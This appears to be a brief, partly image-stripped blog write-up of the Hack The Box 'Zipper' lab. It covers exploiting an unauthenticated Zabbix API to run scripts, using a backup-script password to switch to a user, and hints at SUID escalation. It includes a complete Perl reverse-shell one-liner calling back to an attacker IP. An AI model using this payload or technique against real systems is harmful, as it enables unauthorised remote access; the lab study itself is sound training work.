HTB-靶机 Zipper-Writeup

文章来源：lsh4ck's Blog

Usually scan，nmap+dirb+gobuster+msftcp

find zabbix，ver3.0.21：

think about zabbix has jsrpc.php，any exploit？，json interface is not authorized to access，search it：

python has library named zabbixapi，https://github.com/lukecyca/pyzabbix

EXP. add host：http://blog.chinaunix.net/uid-28309325-id-5176638.html

createuser.py：

createscript.py：

The execute script must execute on zabbix agent not on server cuz server its a docker container

the panel of script before：

after excute the script：

editor the script，use the stable perl or python to backconnect：
perl-e'use Socket;$i="x.x.x.x";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'<br />

create events or triggers，filter use any，more hosts possible：

ncat to listen：

find the files of user zapper is permission denied,cat the backup.sh：
/usr/bin/7z a /backups/zapper_backup-$(/bin/date +%F).7z -pZippityDoDah /home/zapper/utils/* &>/dev/null

shell for backup，-p could be the pwd for zapper

zapper can not ssh：

use python to get a interactive shell：

so can use su，input the pwd，login successfully：

get user.txt

search folder：

The only one that runs with root is the service. Actually, the administrator may be negligent. This should be the way to leave a question for us

suid is running by root

download the pdf of writeup